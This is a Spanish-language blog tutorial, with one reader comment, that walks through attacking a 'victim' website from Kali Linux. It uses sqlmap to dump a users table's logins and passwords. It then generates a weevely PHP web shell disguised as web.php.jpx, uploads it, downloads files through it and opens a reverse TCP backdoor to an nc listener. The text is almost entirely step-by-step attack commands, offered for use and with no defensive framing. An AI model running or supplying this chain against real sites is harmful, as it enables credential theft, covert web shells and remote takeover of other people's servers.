Kali linux hackear una pagina web y manipularla desde kali linux ?

1.- Vamos a obtener la bd

sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs

Esto nos debe de regresar algo asi

2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables

Este es el resultado

3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns

Este es el resultado:

4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:

sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump

Listo hemos obtenido el usuario y password.

2.- Una vez obtenida el usuario y contraseña procedemos a instalar la herramienta PySocks la cual nos ayudara a iniciar la conexión entre nustra maquina y la pagina victima.
git clone https://github.com/Anorov/PySocks.git
cd PySocks
python setup.py install
Nos salimos de la carpeta
cd ..
3.- Ahora usaremos weevely que creara un archivo tunel entre nuestro kali y la pagina victima
Descargamos y entramos a weevely
git clone https://github.com/epinna/weevely3.git 
cd weevely3
Creamos un archivo tunel llamado web.php.jpx
python weevely.py generate hacked /root/Escritorio/web.php.jpx
Donde:
/root/Escritorio/ : es la carpeta donde colocaremos nuestro archivo
En caso de que el anterior comando de errores quizas falta instalar dependencias como se muestra aqui
Subimos el archivo web.php.jpx a la pagina victima
Nos conectamos al archivo desde nuestra maquina local
python weevely.py http://192.168.8.103/admin/uploads/web.php.jpx hacked
Ya estamos en la maquina de la pagina victima y podemos hacer lo que querramos por ejemplo descargar un archivo.
:file_download /var/www/admin/uploads/hacker.png /root/Escritorio/hacker.png
Para mayor comodidad podemos crear un TCP reverse backdoor asi:
nc -l -p 5412
:backdoor_reversetcp
192.168.8.103
5412
Donde
192.168.8.103 La ip de nustro kali

Una respuesta a “Kali linux hackear una pagina web y manipularla desde kali linux ?”

  1. Fabricio dice:

    muy buen tutorial ahora lo voy a probar en practica
    saludos!

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *